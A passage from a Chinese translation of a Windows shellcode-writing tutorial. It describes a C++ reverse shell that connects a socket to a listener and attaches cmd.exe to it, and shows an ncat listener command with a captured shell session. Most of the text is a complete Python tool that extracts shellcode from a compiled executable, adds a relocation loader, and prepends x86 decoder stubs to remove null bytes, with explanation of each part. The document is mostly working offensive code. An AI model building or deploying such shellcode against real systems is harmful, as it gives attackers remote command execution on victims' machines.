複製代碼

decltype(WSAStartup)爲 WSAStartup函數的類型。這樣，咱們無需重定義函數原型。注意：在C++11中有關於 decltype的描述。

如今咱們可經過My_WSAStartup調用 WSAStartup

注意：從模塊中導入函數以前，咱們須要確保已經在內存中加載了這個模塊。

最簡單的方法是使用LoadLibrary加載模塊。

DefineFuncPtr(LoadLibraryA);
  My_LoadLibraryA("ws2_32.dll");
複製代碼

該操做有效，由於kernel32.dll 中已導入了LoadLibrary，正如咱們說過的，它總會出如今內存中。

咱們也能夠導入GetProcAddress並使用它來獲取全部其它咱們須要的函數地址，可是不必這麼作，由於咱們須要將全部的函數名包含在shellcode中。

entryPoint

顯然，entryPoint是shellcode和實現反向shell的入口點。首先，咱們導入全部咱們須要的函數，接着咱們使用它們。細節不重要而且我不得不說winsock API的使用很是麻煩。

在nutshell中:

1.建立套接字， 2.將套接字鏈接到127.0.0.1:123， 3.建立一個執行cmd.exe的進程， 4.將套接字附加到進程的標準輸入，標準輸出以及標準錯誤輸出， 5.等待進程被終止， 6.當進程已經終止時，則終止當前線程。

第3點與第4點同時進行，第4點調用了CreateProcess, 攻擊者能夠鏈接到端口123上進行監聽，一旦被成功鏈接，就能夠經過套接字（socket）,即TCP鏈接，與運行在遠程機器中的cmd.exe進行交互。

安裝ncat，運行cmd並在命令行上輸入：

ncat -lvp 123
複製代碼

此時將會在端口123上監聽.

接着回到Visual Studio 2013，選擇Release，搭建項目並運行它。再回到ncat，你將觀察到以下：

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>
複製代碼

如今能夠執行任意命令了。退出則輸入exit。

main

得益於linker的選項

Function Order: function_order.txt
複製代碼

function_order.txt中的第一行僅有一行存在?entryPoint@@YAHXZ字符串，函數 entryPoint將首先被定位在shellcode中。

在源碼中，linker決定了函數的順序，所以咱們可在任意函數前放入entryPoint 。main函數在源碼中的最後部分，所以它會在shellcode的結尾處被連接。當描述映射文件時，咱們將瞭解到這是如何實現的。

0x02 Python腳本

介紹

如今，含有shellcode的執行體已經準備就緒，咱們須要一種提取並修復shellcode的方法。這並不容易，我已經編寫了Python腳原本實現：

1.提取shellcode

2.處理字符串的重定位信息

3.經過移除null字節修復shellcode

使用 PyCharm (下載地址).

該腳本只有392行，可是它有些複雜，所以我將對其進行解釋：代碼以下：

# Shellcode extractor by Massimiliano Tomassoli (2015)
 
import sys
import os
import datetime
import pefile
 
author = 'Massimiliano Tomassoli'
year = datetime.date.today().year
 
 
def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]
 
 
def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)
 
 
def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]
 
 
def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
 
 
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
 
        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)
 
    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None
 
 
def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])
 
 
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)
 
 
def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)
 
 
def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''
 
    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]
 
    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)
 
 
def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))
 
 
def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break
 
    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])
 
    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) / 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes
 
    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)
 
 
def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))
 
    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return
 
    exe_file = sys.argv[1]
    map_file = sys.argv[2]
 
    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)
 
    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result
 
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
 
    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] Cannot fix the shellcode')
 
    print('final shellcode length: %d\n' % len(fixed_shellcode))
    print('char shellcode[] = ')
    dump_shellcode(fixed_shellcode)
 
 
main()
複製代碼

映射文件以及`shellcode`長度

在linker中使用以下選項來生成映射文件：

Debugging:
- Generate Map File: Yes (/MAP)

告訴linker生成含有EXE結構的映射文件。

* Map File Name: mapfile
複製代碼

該映射文件主要用於判斷shellcode長度。

這裏是映射文件的相關部分：

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@[email protected]         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@[email protected] 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>
複製代碼

從映射文件的開頭得知，section 1爲.text節，它含有代碼：

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE
複製代碼

第二部分代表 .text節起始於 ?entryPoint@@YAHXZ，這是咱們的entryPoint函數，最後一個函數是函數main（這裏被稱做_main）。由於main函數在偏移0x266上，而且entryPoint函數位於``，咱們的shellcode起始於.text節的開頭，而且長度爲0x266字節。

使用python實現：

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
複製代碼

提取 shellcode

這部分很是容易理解，咱們知道shellcode的長度而且知道shellcode被定位在.text節的起始部分。代碼以下：

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                <snip>
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
<snip>
複製代碼

我使用了模塊pefile (下載地址). 相關的部分是if語句體。

字符串和.rdata

正如以前所說的，c/c++代碼可能含有字符串。例如，咱們的shellcode含有以下代碼：

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);
複製代碼

字符串cmd.exe被定位在.rdata節中，該節是一個只讀的含有數據（已被初始化）的節。該代碼對字符串進行絕對地址引用。

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]
複製代碼

正如咱們觀察到的，cmd.exe的絕對地址是242118h。注意該地址是push指令的一部分而且該絕對地址被定位在了24116Bh。若是咱們用某個文件編輯器檢測文件cmd.exe,咱們看到以下：

56A: 68 18 21 40 00           push        000402118h
複製代碼

在文件中56Ah是偏移量。由於image base的偏移量爲400000h，因此對應的虛擬地址是40116A。在內存中，這應該是執行體被加載的首選的（preferred）地址。執行體在指令中的絕對地址是402118h，若是執行體在首選的基地址上被加載，即代表已正確執行。然而，若是執行體在不一樣的基地址上被加載，那麼須要修復指令。Windows如何知道執行體含有須要被修復的地址？PE文件含有一個相對目錄（Relocation Directory），在咱們的案例中它指向.reloc節。該相對目錄中包含全部須要被修復的位置上的RVA。

能夠檢查該目錄並尋找以下所描述的位置上的地址

1.在shellcode中含有的（即從.text:0到末尾，main函數除外）， 2.含有.rdata中的數據指針。

例如，在其餘地址中，Relocation Directory將包含位於指令push 402118h的後四個字節的地址40116Bh。這些字節構成了地址402118h，它指向在.rdata中的字符串cmd.exe（起始於地址402000h）。

觀察函數get_shellcode_and_relocs。在第一部分咱們提取.rdata節：

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
複製代碼

相關部分是elif的語句體。

接着分析重定位部分，在咱們的shellcode中尋找地址並從.rdata中提取被那些地址引用的以null結尾的字符串。

正如咱們已經說過的，咱們只關注shellcode中的地址。這裏是函數get_shellcode_and_relocs的相關部分：

# Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)
複製代碼

pe.DIRECTORY_ENTRY_BASERELOC是一個數據結構表，它含有一個重定位表的入口。首先檢查當前重定位信息是否在shellcode中。若是是，則進行以下操做：

1.將與shellcode的起始地址有關的重定位信息的偏移追加到 relocs；

2.從shellcode中提取在已經發現的偏移上的DWORD值，並在.rdata中檢查該指向數據的DWORD值；

3.從.rdata中提取起始於咱們在(2)中發現的以null結尾的字符串；

4.將字符串添加到addr_to_strings。

注意：

i.relocs含有在shellcode中重定位信息的偏移，即在須要被修復的shellcode中的DWORD值的偏移，以便它們指向字符串；

ii.addr_to_strings至關於一個與在(2)中被發現的字符串所在地址相關聯的字典。

將loader添加到shellcode

方法是將被包含在addr_to_strings中的字符串添加到咱們shellcode的尾部，而後讓咱們的代碼引用那些字符串。

不幸的是，代碼->字符串的連接過程必須在運行時完成，由於咱們不知道shellcode的起始地址，那麼咱們須要準備一個在運行時修復shellcode的「loader」。這是轉化後的shellcode結構:

OffX是指向原shellcode中重定位信息的DWORD值，它們須要被修復。loader將修復這些地址來讓它們指向正確的字符串strX。試圖理解如下代碼來了解實現原理：

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)
複製代碼

觀察loader：

CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...
複製代碼

首先，使用CALL來獲取here在內存中的絕對地址。loader使用該信息對原shellcode中的偏移進行修復。ESI指向off1，所以使用LODSD來逐一讀取偏移。該指令

ADD [EDI+EAX], EDI
複製代碼

用於修復shellcode中的地址。EAX是當前的offX，offX是與here相關的地址偏移。這意味着EDI+EAX是那個位置上的絕對地址。DWORD值在那個地址上包含相對於here的字符串偏移。經過將EDI添加到那個DWORD值，咱們將該DWORD值轉換爲該字符串的絕對地址。當loader已經執行完畢時，shellcode已被修復，同時也被成功執行。

總結，若是存在重定位信息，那麼會調用add_loader_to_shellcode。可在main函數中觀察到：

<snip>
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
<snip>
複製代碼

從`shellcode`中移除`null`字節 (I)

編寫以下兩個函數來刪去null字節。

1.get_fixed_shellcode_single_block
2.get_fixed_shellcode
複製代碼

能夠試試使用第一個函數生成更短的代碼，可是這樣作不必定可被執行。可是若是使用第二個函數生成更長的代碼，則一定可被執行。

首先觀察get_fixed_shellcode_single_block函數，該函數的定義以下：

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
